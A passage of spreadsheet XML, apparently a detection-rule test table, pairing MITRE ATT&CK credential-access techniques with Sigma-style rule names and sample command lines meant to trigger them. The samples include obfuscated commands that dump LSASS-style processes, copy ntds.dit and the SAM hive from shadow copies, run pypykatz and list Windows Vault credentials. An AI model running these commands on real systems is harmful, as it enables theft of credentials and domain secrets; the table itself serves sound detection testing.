      <c r="F807" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G807" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H807" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I807" s="43" t="n"/>
      <c r="J807" s="43" t="n"/>
      <c r="K807" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="808" ht="15.75" customHeight="1" s="42">
      <c r="A808" s="43" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B808" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_sqldumper_activity</t>
        </is>
      </c>
      <c r="C808" s="43" t="inlineStr">
        <is>
          <t>Dumping Process via Sqldumper.exe</t>
        </is>
      </c>
      <c r="D808" s="43" t="inlineStr">
        <is>
          <t>23ceaf5c-b6f1-4a32-8559-f2ff734be516</t>
        </is>
      </c>
      <c r="E808" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "sqldumper.exe 700 0 0^x0110"</t>
        </is>
      </c>
      <c r="F808" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G808" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H808" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I808" s="43" t="n"/>
      <c r="J808" s="43" t="n"/>
      <c r="K808" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="809" ht="15.75" customHeight="1" s="42">
      <c r="A809" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B809" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C809" s="43" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D809" s="43" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E809" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set part1=HarddiskVolume &amp;&amp; set part2=ShadowCopy &amp;&amp; call mklink /D C:\temp\vss \?\GLOBALROOT\Device\%part1%%part2%1"</t>
        </is>
      </c>
      <c r="F809" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G809" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H809" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I809" s="43" t="n"/>
      <c r="J809" s="43" t="n"/>
      <c r="K809" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="810" ht="15.75" customHeight="1" s="42">
      <c r="A810" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B810" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C810" s="43" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D810" s="43" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E810" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\ntds &amp;&amp; esentutl.exe ,/y,ntds.dit C:\temp\ntds.bak"</t>
        </is>
      </c>
      <c r="F810" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G810" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H810" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I810" s="43" t="n"/>
      <c r="J810" s="43" t="n"/>
      <c r="K810" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="811" ht="15.75" customHeight="1" s="42">
      <c r="A811" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B811" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_pypykatz</t>
        </is>
      </c>
      <c r="C811" s="43" t="inlineStr">
        <is>
          <t>HackTool - Pypykatz Credentials Dumping Activity</t>
        </is>
      </c>
      <c r="D811" s="43" t="inlineStr">
        <is>
          <t>a29808fd-ef50-49ff-9c7a-59a9b040b404</t>
        </is>
      </c>
      <c r="E811" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "pypykatz l^ive reg^istry"</t>
        </is>
      </c>
      <c r="F811" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G811" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H811" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I811" s="43" t="n"/>
      <c r="J811" s="43" t="n"/>
      <c r="K811" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="812" ht="15.75" customHeight="1" s="42">
      <c r="A812" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B812" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_quarks_pwdump</t>
        </is>
      </c>
      <c r="C812" s="43" t="inlineStr">
        <is>
          <t>HackTool - Quarks PwDump Execution</t>
        </is>
      </c>
      <c r="D812" s="43" t="inlineStr">
        <is>
          <t>0685b176-c816-4837-8e7b-1216f346636b</t>
        </is>
      </c>
      <c r="E812" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\sys_update.exe --dump-ha^sh-local"</t>
        </is>
      </c>
      <c r="F812" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G812" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H812" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I812" s="43" t="n"/>
      <c r="J812" s="43" t="n"/>
      <c r="K812" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="813" ht="15.75" customHeight="1" s="42">
      <c r="A813" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B813" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C813" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D813" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E813" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc YwBvAHAAeQAgACcAXABcAD8AXABHAEwATwBCAEEATABSAE8ATwBUAFwARABlAHYAaQBjAGUAXABIAGEAcgBkAGQAaQBzAGsAVgBvAGwAdQBtAGUAUwBoAGEAZABvAHcAQwBvAHAAeQAxAFwAVwBpAG4AZABvAHcAcwBcAFAAWQBTAFQARQBNADMAMgBcAGMAbwBuAGYAaQBnAFwAcwBhAG0AJwAgACcAQwA6AFwAdABlAG0AcABcAHMAYQBtACc=</t>
        </is>
      </c>
      <c r="F813" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G813" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H813" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I813" s="43" t="n"/>
      <c r="J813" s="43" t="n"/>
      <c r="K813" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="814" ht="15.75" customHeight="1" s="42">
      <c r="A814" s="43" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B814" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ntdsutil_susp_usage</t>
        </is>
      </c>
      <c r="C814" s="43" t="inlineStr">
        <is>
          <t>Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)</t>
        </is>
      </c>
      <c r="D814" s="43" t="inlineStr">
        <is>
          <t>a58353df-af43-4753-bad0-cd83ef35eef5</t>
        </is>
      </c>
      <c r="E814" s="43" t="inlineStr">
        <is>
          <t>echo snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit | ntdsutil.exe</t>
        </is>
      </c>
      <c r="F814" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G814" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H814" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I814" s="43" t="n"/>
      <c r="J814" s="43" t="n"/>
      <c r="K814" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="815" ht="15.75" customHeight="1" s="42">
      <c r="A815" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B815" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vaultcmd_list_creds</t>
        </is>
      </c>
      <c r="C815" s="43" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd</t>
        </is>
      </c>
      <c r="D815" s="43" t="inlineStr">
        <is>
          <t>58f50261-c53b-4c88-bd12-1d71f12eda4c</t>
        </is>
      </c>
      <c r="E815" s="43" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32\VaultCmd.exe" "/list"creds:"Windows Credentials" /all</t>
        </is>
      </c>
      <c r="F815" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G815" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H815" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I815" s="43" t="n"/>
      <c r="J815" s="43" t="n"/>
      <c r="K815" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="816" ht="15.75" customHeight="1" s="42">
      <c r="A816" s="43" t="n"/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</row>
    <row r="817" ht="15.75" customHeight="1" s="42">
      <c r="A817" s="43" t="n"/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</row>
    <row r="818" ht="15.75" customHeight="1" s="42">
      <c r="A818" s="43" t="n"/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</row>
    <row r="819" ht="15.75" customHeight="1" s="42">
      <c r="A819" s="43" t="n"/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</row>
    <row r="820" ht="15.75" customHeight="1" s="42">
      <c r="A820" s="43" t="n"/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</row>
    <row r="821" ht="15.75" customHeight="1" s="42">
      <c r="A821" s="43" t="n"/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</row>
    <row r="822" ht="15.75" customHeight="1" s="42">
      <c r="A822" s="43" t="n"/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</row>
    <row r="823" ht="15.75" customHeight="1" s="42">
      <c r="A823" s="43" t="n"/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</row>
    <row r="824" ht="15.75" customHeight="1" s="42">
      <c r="A824" s="43" t="n"/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</row>
    <row r="825" ht="15.75" customHeight="1" s="42">
      <c r="A825" s="43" t="n"/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</row>
    <row r="826" ht="15.75" customHeight="1" s="42">
      <c r="A826" s="43" t="n"/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</row>
    <row r="827" ht="15.75" customHeight="1" s="42">
      <c r="A827" s="43" t="n"/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</row>
    <row r="828" ht="15.75" customHeight="1" s="42">
      <c r="A828" s="43" t="n"/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</row>
    <row r="829" ht="15.75" customHeight="1" s="42">
      <c r="A829" s="43" t="n"/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</row>
    <row r="830" ht="15.75" customHeight="1" s="42">
      <c r="A830" s="43" t="n"/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</row>
    <row r="831" ht="15.75" customHeight="1" s="42">
      <c r="A831" s="43" t="n"/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</row>
    <row r="832" ht="15.75" customHeight="1" s="42">
      <c r="A832" s="43" t="n"/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</row>
    <row r="833" ht="15.75" customHeight="1" s="42">
      <c r="A833" s="43" t="n"/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</row>
    <row r="834" ht="15.75" customHeight="1" s="42">
      <c r="A834" s="43" t="n"/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</row>
    <row r="835" ht="15.75" customHeight="1" s="42">
      <c r="A835" s="43" t="n"/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</row>
    <row r="836" ht="15.75" customHeight="1" s="42">
      <c r="A836" s="43" t="n"/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</row>
    <row r="837" ht="15.75" customHeight="1" s="42">
      <c r="A837" s="43" t="n"/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</row>
    <row r="838" ht="15.75" customHeight="1" s="42">
      <c r="A838" s="43" t="n"/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</row>
    <row r="839" ht="15.75" customHeight="1" s="42">
      <c r="A839" s="43" t="n"/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</row>
    <row r="840" ht="15.75" customHeight="1" s="42">
      <c r="A840" s="43" t="n"/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</row>
    <row r="841" ht="15.75" customHeight="1" s="42">
      <c r="A841" s="43" t="n"/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</row>
    <row r="842" ht="15.75" customHeight="1" s="42">
      <c r="A842" s="43" t="n"/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</row>
    <row r="843" ht="15.75" customHeight="1" s="42">
      <c r="A843" s="43" t="n"/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</row>
    <row r="844" ht="15.75" customHeight="1" s="42">
      <c r="A844" s="43" t="n"/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</row>
    <row r="845" ht="15.75" customHeight="1" s="42">
      <c r="A845" s="43" t="n"/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</row>
    <row r="846" ht="15.75" customHeight="1" s="42">
      <c r="A846" s="43" t="n"/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</row>
    <row r="847" ht="15.75" customHeight="1" s="42">
      <c r="A847" s="43" t="n"/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</row>
    <row r="848" ht="15.75" customHeight="1" s="42">
      <c r="A848" s="43" t="n"/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</row>
    <row r="849" ht="15.75" customHeight="1" s="42">
      <c r="A849" s="43" t="n"/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</row>
    <row r="850" ht="15.75" customHeight="1" s="42">
      <c r="A850" s="43" t="n"/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</row>
    <row r="851" ht="15.75" customHeight="1" s="42">
      <c r="A851" s="43" t="n"/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</row>
    <row r="852" ht="15.75" customHeight="1" s="42">
      <c r="A852" s="43" t="n"/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</row>
    <row r="853" ht="15.75" customHeight="1" s="42">
      <c r="A853" s="43" t="n"/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</row>
    <row r="854" ht="15.75" customHeight="1" s="42">
      <c r="A854" s="43" t="n"/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</row>
    <row r="855" ht="15.75" customHeight="1" s="42">
      <c r="A855" s="43" t="n"/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</row>
    <row r="856" ht="15.75" customHeight="1" s="42">
      <c r="A856" s="43" t="n"/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</row>
    <row r="857" ht="15.75" customHeight="1" s="42">
      <c r="A857" s="43" t="n"/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</row>
    <row r="858" ht="15.75" customHeight="1" s="42">
      <c r="A858" s="43" t="n"/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</row>
    <row r="859" ht="15.75" customHeight="1" s="42">
      <c r="A859" s="43" t="n"/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</row>
    <row r="860" ht="15.75" customHeight="1" s="42">
      <c r="A860" s="43" t="n"/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</row>
    <row r="861" ht="15.75" customHeight="1" s="42">
      <c r="A861" s="43" t="n"/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</row>
    <row r="862" ht="15.75" customHeight="1" s="42">
      <c r="A862" s="43" t="n"/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</row>
    <row r="863" ht="15.75" customHeight="1" s="42">
      <c r="A863" s="43" t="n"/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</row>
    <row r="864" ht="15.75" customHeight="1" s="42">
      <c r="A864" s="43" t="n"/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</row>
    <row r="865" ht="15.75" customHeight="1" s="42">
      <c r="A865" s="43" t="n"/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</row>
    <row r="866" ht="15.75" customHeight="1" s="42">
      <c r="A866" s="43" t="n"/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</row>
    <row r="867" ht="15.75" customHeight="1" s="42">
      <c r="A867" s="43" t="n"/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</row>
    <row r="868" ht="15.75" customHeight="1" s="42">
      <c r="A868" s="43" t="n"/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</row>
    <row r="869" ht="15.75" customHeight="1" s="42">
      <c r="A869" s="43" t="n"/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</row>
    <row r="870" ht="15.75" customHeight="1" s="42">
      <c r="A870" s="43" t="n"/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</row>
    <row r="871" ht="15.75" customHeight="1" s="42">
      <c r="A871" s="43" t="n"/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</row>
    <row r="872" ht="15.75" customHeight="1" s="42">
      <c r="A872" s="43" t="n"/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</row>
    <row r="873" ht="15.75" customHeight="1" s="42">
      <c r="A873" s="43" t="n"/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</row>
    <row r="874" ht="15.75" customHeight="1" s="42">
      <c r="A874" s="43" t="n"/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</row>
    <row r="875" ht="15.75" customHeight="1" s="42">
      <c r="A875" s="43" t="n"/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</row>
    <row r="876" ht="15.75" customHeight="1" s="42">
      <c r="A876" s="43" t="n"/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</row>
    <row r="877" ht="15.75" customHeight="1" s="42">
      <c r="A877" s="43" t="n"/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</row>
    <row r="878" ht="15.75" customHeight="1" s="42">
      <c r="A878" s="43" t="n"/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</row>
    <row r="879" ht="15.75" customHeight="1" s="42">
      <c r="A879" s="43" t="n"/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</row>
    <row r="880" ht="15.75" customHeight="1" s="42">
      <c r="A880" s="43" t="n"/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</row>
    <row r="881" ht="15.75" customHeight="1" s="42">
      <c r="A881" s="43" t="n"/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</row>
    <row r="882" ht="15.75" customHeight="1" s="42">
      <c r="A882" s="43" t="n"/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</row>
    <row r="883" ht="15.75" customHeight="1" s="42">
      <c r="A883" s="43" t="n"/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</row>
    <row r="884" ht="15.75" customHeight="1" s="42">
      <c r="A884" s="43" t="n"/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</row>
    <row r="885" ht="15.75" customHeight="1" s="42">
      <c r="A885" s="43" t="n"/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</row>
    <row r="886" ht="15.75" customHeight="1" s="42">
      <c r="A886" s="43" t="n"/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</row>
    <row r="887" ht="15.75" customHeight="1" s="42">
      <c r="A887" s="43" t="n"/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</row>
    <row r="888" ht="15.75" customHeight="1" s="42">
      <c r="A888" s="43" t="n"/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</row>
    <row r="889" ht="15.75" customHeight="1" s="42">
      <c r="A889" s="43" t="n"/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</row>
    <row r="890" ht="15.75" customHeight="1" s="42">
      <c r="A890" s="43" t="n"/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</row>
    <row r="891" ht="15.75" customHeight="1" s="42">
      <c r="A891" s="43" t="n"/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</row>
    <row r="892" ht="15.75" customHeight="1" s="42">
      <c r="A892" s="43" t="n"/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</row>
    <row r="893" ht="15.75" customHeight="1" s="42">
      <c r="A893" s="43" t="n"/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</row>
    <row r="894" ht="15.75" customHeight="1" s="42">
      <c r="A894" s="43" t="n"/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</row>
    <row r="895" ht="15.75" customHeight="1" s="42">
      <c r="A895" s="43" t="n"/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</row>
    <row r="896" ht="15.75" customHeight="1" s="42">
      <c r="A896" s="43" t="n"/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</row>
    <row r="897" ht="15.75" customHeight="1" s="42">
      <c r="A897" s="43" t="n"/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</row>
    <row r="898" ht="15.75" customHeight="1" s="42">
      <c r="A898" s="43" t="n"/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</row>
    <row r="899" ht="15.75" customHeight="1" s="42">
      <c r="A899" s="43" t="n"/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</row>
    <row r="900" ht="15.75" customHeight="1" s="42">
      <c r="A900" s="43" t="n"/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</row>
    <row r="901" ht="15.75" customHeight="1" s="42">
      <c r="A901" s="43" t="n"/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</row>
    <row r="902" ht="15.75" customHeight="1" s="42">
      <c r="A902" s="43" t="n"/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</row>
    <row r="903" ht="15.75" customHeight="1" s="42">
      <c r="A903" s="43" t="n"/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</row>
    <row r="904" ht="15.75" customHeight="1" s="42">
      <c r="A904" s="43" t="n"/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</row>
    <row r="905" ht="15.75" customHeight="1" s="42">
      <c r="A905" s="43" t="n"/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</row>
    <row r="906" ht="15.75" customHeight="1" s="42">
      <c r="A906" s="43" t="n"/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</row>
    <row r="907" ht="15.75" customHeight="1" s="42">
      <c r="A907" s="43" t="n"/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</row>
    <row r="908" ht="15.75" customHeight="1" s="42">
      <c r="A908" s="43" t="n"/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</row>
    <row r="909" ht="15.75" customHeight="1" s="42">
      <c r="A909" s="43" t="n"/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</row>
    <row r="910" ht="15.75" customHeight="1" s="42">
      <c r="A910" s="43" t="n"/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</row>
    <row r="911" ht="15.75" customHeight="1" s="42">
      <c r="A911" s="43" t="n"/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</row>
    <row r="912" ht="15.75" customHeight="1" s="42">
      <c r="A912" s="43" t="n"/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</row>
    <row r="913" ht="15.75" customHeight="1" s="42">
      <c r="A913" s="43" t="n"/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</row>
    <row r="914" ht="15.75" customHeight="1" s="42">
      <c r="A914" s="43" t="n"/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</row>
    <row r="915" ht="15.75" customHeight="1" s="42">
      <c r="A915" s="43" t="n"/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</row>
    <row r="916" ht="15.75" customHeight="1" s="42">
      <c r="A916" s="43" t="n"/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</row>
    <row r="917" ht="15.75" customHeight="1" s="42">
      <c r="A917" s="43" t="n"/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</row>
    <row r="918" ht="15.75" customHeight="1" s="42">
      <c r="A918" s="43" t="n"/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</row>
    <row r="919" ht="15.75" customHeight="1" s="42">
      <c r="A919" s="43" t="n"/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</row>
    <row r="920" ht="15.75" customHeight="1" s="42">
      <c r="A920" s="43" t="n"/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</row>
    <row r="921" ht="15.75" customHeight="1" s="42">
      <c r="A921" s="43" t="n"/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</row>
    <row r="922" ht="15.75" customHeight="1" s="42">
      <c r="A922" s="43" t="n"/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</row>
    <row r="923" ht="15.75" customHeight="1" s="42">
      <c r="A923" s="43" t="n"/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</row>
    <row r="924" ht="15.75" customHeight="1" s="42">
      <c r="A924" s="43" t="n"/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</row>
    <row r="925" ht="15.75" customHeight="1" s="42">
      <c r="A925" s="43" t="n"/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</row>
    <row r="926" ht="15.75" customHeight="1" s="42">
      <c r="A926" s="43" t="n"/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</row>
    <row r="927" ht="15.75" customHeight="1" s="42">
      <c r="A927" s="43" t="n"/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</row>
    <row r="928" ht="15.75" customHeight="1" s="42">
      <c r="A928" s="43" t="n"/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</row>
    <row r="929" ht="15.75" customHeight="1" s="42">
      <c r="A929" s="43" t="n"/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</row>
    <row r="930" ht="15.75" customHeight="1" s="42">
      <c r="A930" s="43" t="n"/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</row>
    <row r="931" ht="15.75" customHeight="1" s="42">
      <c r="A931" s="43" t="n"/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</row>
    <row r="932" ht="15.75" customHeight="1" s="42">
      <c r="A932" s="43" t="n"/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</row>
    <row r="933" ht="15.75" customHeight="1" s="42">
      <c r="A933" s="43" t="n"/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</row>
    <row r="934" ht="15.75" customHeight="1" s="42">
      <c r="A934" s="43" t="n"/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</row>
    <row r="935" ht="15.75" customHeight="1" s="42">
      <c r="A935" s="43" t="n"/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</row>
    <row r="936" ht="15.75" customHeight="1" s="42">
      <c r="A936" s="43" t="n"/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</row>
    <row r="937" ht="15.75" customHeight="1" s="42">
      <c r="A937" s="43" t="n"/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</row>
    <row r="938" ht="15.75" customHeight="1" s="42">
      <c r="A938" s="43" t="n"/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</row>
    <row r="939" ht="15.75" customHeight="1" s="42">
      <c r="A939" s="43" t="n"/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</row>
    <row r="940" ht="15.75" customHeight="1" s="42">
      <c r="A940" s="43" t="n"/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</row>
    <row r="941" ht="15.75" customHeight="1" s="42">
      <c r="A941" s="43" t="n"/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</row>
    <row r="942" ht="15.75" customHeight="1" s="42">
      <c r="A942" s="43" t="n"/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</row>
    <row r="943" ht="15.75" customHeight="1" s="42">
      <c r="A943" s="43" t="n"/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</row>
    <row r="944" ht="15.75" customHeight="1" s="42">
      <c r="A944" s="43" t="n"/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</row>
    <row r="945" ht="15.75" customHeight="1" s="42">
      <c r="A945" s="43" t="n"/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</row>
    <row r="946" ht="15.75" customHeight="1" s="42">
      <c r="A946" s="43" t="n"/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</row>
    <row r="947" ht="15.75" customHeight="1" s="42">
      <c r="A947" s="43" t="n"/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</row>
    <row r="948" ht="15.75" customHeight="1" s="42">
      <c r="A948" s="43" t="n"/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</row>
    <row r="949" ht="15.75" customHeight="1" s="42">
      <c r="A949" s="43" t="n"/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</row>
    <row r="950" ht="15.75" customHeight="1" s="42">
      <c r="A950" s="43" t="n"/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</row>
    <row r="951" ht="15.75" customHeight="1" s="42">
      <c r="A951" s="43" t="n"/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</row>
    <row r="952" ht="15.75" customHeight="1" s="42">
      <c r="A952" s="43" t="n"/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</row>
    <row r="953" ht="15.75" customHeight="1" s="42">
      <c r="A953" s="43" t="n"/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</row>
    <row r="954" ht="15.75" customHeight="1" s="42">
      <c r="A954" s="43" t="n"/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</row>
    <row r="955" ht="15.75" customHeight="1" s="42">
      <c r="A955" s="43" t="n"/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</row>
    <row r="956" ht="15.75" customHeight="1" s="42">
      <c r="A956" s="43" t="n"/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</row>
    <row r="957" ht="15.75" customHeight="1" s="42">
      <c r="A957" s="43" t="n"/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</row>
    <row r="958" ht="15.75" customHeight="1" s="42">
      <c r="A958" s="43" t="n"/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</row>
    <row r="959" ht="15.75" customHeight="1" s="42">
      <c r="A959" s="43" t="n"/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</row>
    <row r="960" ht="15.75" customHeight="1" s="42">
      <c r="A960" s="43" t="n"/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</row>
    <row r="961" ht="15.75" customHeight="1" s="42">
      <c r="A961" s="43" t="n"/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</row>
    <row r="962" ht="15.75" customHeight="1" s="42">
      <c r="A962" s="43" t="n"/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</row>
    <row r="963" ht="15.75" customHeight="1" s="42">
      <c r="A963" s="43" t="n"/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</row>
    <row r="964" ht="15.75" customHeight="1" s="42">
      <c r="A964" s="43" t="n"/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</row>
    <row r="965" ht="15.75" customHeight="1" s="42">
      <c r="A965" s="43" t="n"/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</row>
    <row r="966" ht="15.75" customHeight="1" s="42">
      <c r="A966" s="43" t="n"/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</row>
    <row r="967" ht="15.75" customHeight="1" s="42">
      <c r="A967" s="43" t="n"/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</row>
    <row r="968" ht="15.75" customHeight="1" s="42">
      <c r="A968" s="43" t="n"/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</row>
    <row r="969" ht="15.75" customHeight="1" s="42">
      <c r="A969" s="43" t="n"/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</row>
    <row r="970" ht="15.75" customHeight="1" s="42">
      <c r="A970" s="43" t="n"/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</row>
    <row r="971" ht="15.75" customHeight="1" s="42">
      <c r="A971" s="43" t="n"/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</row>
    <row r="972" ht="15.75" customHeight="1" s="42">
      <c r="A972" s="43" t="n"/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</row>
    <row r="973" ht="15.75" customHeight="1" s="42">
      <c r="A973" s="43" t="n"/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</row>
    <row r="974" ht="15.75" customHeight="1" s="42">
      <c r="A974" s="43" t="n"/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</row>
    <row r="975" ht="15.75" customHeight="1" s="42">
      <c r="A975" s="43" t="n"/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</row>
    <row r="976" ht="15.75" customHeight="1" s="42">
      <c r="A976" s="43" t="n"/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</row>
    <row r="977" ht="15.75" customHeight="1" s="42">
      <c r="A977" s="43" t="n"/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</row>
    <row r="978" ht="15.75" customHeight="1" s="42">
      <c r="A978" s="43" t="n"/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</row>
    <row r="979" ht="15.75" customHeight="1" s="42">
      <c r="A979" s="43" t="n"/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</row>
    <row r="980" ht="15.75" customHeight="1" s="42">
      <c r="A980" s="43" t="n"/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</row>
    <row r="981" ht="15.75" customHeight="1" s="42">
      <c r="A981" s="43" t="n"/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</row>
    <row r="982" ht="15.75" customHeight="1" s="42">
      <c r="A982" s="43" t="n"/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</row>
    <row r="983" ht="15.75" customHeight="1" s="42">
      <c r="A983" s="43" t="n"/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</row>
    <row r="984" ht="15.75" customHeight="1" s="42">
      <c r="A984" s="43" t="n"/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</row>
    <row r="985" ht="15.75" customHeight="1" s="42">
      <c r="A985" s="43" t="n"/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</row>
    <row r="986" ht="15.75" customHeight="1" s="42">
      <c r="A986" s="43" t="n"/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</row>
    <row r="987" ht="15.75" customHeight="1" s="42">
      <c r="A987" s="43" t="n"/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</row>
    <row r="988" ht="15.75" customHeight="1" s="42">
      <c r="A988" s="43" t="n"/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</row>
    <row r="989" ht="15.75" customHeight="1" s="42">
      <c r="A989" s="43" t="n"/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</row>
    <row r="990" ht="15.75" customHeight="1" s="42">
      <c r="A990" s="43" t="n"/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</row>
    <row r="991" ht="15.75" customHeight="1" s="42">
      <c r="A991" s="43" t="n"/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</row>
    <row r="992" ht="15.75" customHeight="1" s="42">
      <c r="A992" s="43" t="n"/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</row>
    <row r="993" ht="15.75" customHeight="1" s="42">
      <c r="A993" s="43" t="n"/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</row>
    <row r="994" ht="15.75" customHeight="1" s="42">
      <c r="A994" s="43" t="n"/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</row>
    <row r="995" ht="15.75" customHeight="1" s="42">
      <c r="A995" s="43" t="n"/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</row>
    <row r="996" ht="15.75" customHeight="1" s="42">
      <c r="A996" s="43" t="n"/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</row>
    <row r="997" ht="15.75" customHeight="1" s="42">
      <c r="A997" s="43" t="n"/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</row>
    <row r="998" ht="15.75" customHeight="1" s="42">
      <c r="A998" s="43" t="n"/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</row>
    <row r="999" ht="15.75" customHeight="1" s="42">
      <c r="A999" s="43" t="n"/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</row>
    <row r="1000" ht="15.75" customHeight="1" s="42">
      <c r="A1000" s="43" t="n"/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</row>
    <row r="1001" ht="15.75" customHeight="1" s="42">
      <c r="A1001" s="43" t="n"/>
      <c r="B1001" s="43" t="n"/>
      <c r="C1001" s="43" t="n"/>
      <c r="D1001" s="43" t="n"/>
      <c r="E1001" s="43" t="n"/>
      <c r="F1001" s="43" t="n"/>
      <c r="G1001" s="43" t="n"/>
      <c r="H1001" s="43" t="n"/>
      <c r="I1001" s="43" t="n"/>
      <c r="J1001" s="43" t="n"/>
    </row>
    <row r="1002" ht="15.75" customHeight="1" s="42">
      <c r="A1002" s="43" t="n"/>
      <c r="B1002" s="43" t="n"/>
      <c r="C1002" s="43" t="n"/>
      <c r="D1002" s="43" t="n"/>
      <c r="E1002" s="43" t="n"/>
      <c r="F1002" s="43" t="n"/>
      <c r="G1002" s="43" t="n"/>
      <c r="H1002" s="43" t="n"/>
      <c r="I1002" s="43" t="n"/>
      <c r="J1002" s="43" t="n"/>
    </row>
    <row r="1003" ht="15.75" customHeight="1" s="42">
      <c r="A1003" s="43" t="n"/>
      <c r="B1003" s="43" t="n"/>
      <c r="C1003" s="43" t="n"/>
      <c r="D1003" s="43" t="n"/>
      <c r="E1003" s="43" t="n"/>
      <c r="F1003" s="43" t="n"/>
      <c r="G1003" s="43" t="n"/>
      <c r="H1003" s="43" t="n"/>
      <c r="I1003" s="43" t="n"/>
      <c r="J1003" s="43" t="n"/>
    </row>
    <row r="1004" ht="15.75" customHeight="1" s="42">
      <c r="A1004" s="43" t="n"/>
      <c r="B1004" s="43" t="n"/>
      <c r="C1004" s="43" t="n"/>
      <c r="D1004" s="43" t="n"/>
      <c r="E1004" s="43" t="n"/>
      <c r="F1004" s="43" t="n"/>
      <c r="G1004" s="43" t="n"/>
      <c r="H1004" s="43" t="n"/>
      <c r="I1004" s="43" t="n"/>
      <c r="J1004" s="43" t="n"/>
    </row>
    <row r="1005" ht="15.75" customHeight="1" s="42">
      <c r="A1005" s="43" t="n"/>
      <c r="B1005" s="43" t="n"/>
      <c r="C1005" s="43" t="n"/>
      <c r="D1005" s="43" t="n"/>
      <c r="E1005" s="43" t="n"/>
      <c r="F1005" s="43" t="n"/>
      <c r="G1005" s="43" t="n"/>
      <c r="H1005" s="43" t="n"/>
      <c r="I1005" s="43" t="n"/>
      <c r="J1005" s="43" t="n"/>
    </row>
    <row r="1006" ht="15.75" customHeight="1" s="42">
      <c r="A1006" s="43" t="n"/>
      <c r="B1006" s="43" t="n"/>
      <c r="C1006" s="43" t="n"/>
      <c r="D1006" s="43" t="n"/>
      <c r="E1006" s="43" t="n"/>
      <c r="F1006" s="43" t="n"/>
      <c r="G1006" s="43" t="n"/>
      <c r="H1006" s="43" t="n"/>
      <c r="I1006" s="43" t="n"/>
      <c r="J1006" s="43" t="n"/>
    </row>
    <row r="1007" ht="15.75" customHeight="1" s="42">
      <c r="A1007" s="43" t="n"/>
      <c r="B1007" s="43" t="n"/>
      <c r="C1007" s="43" t="n"/>
      <c r="D1007" s="43" t="n"/>
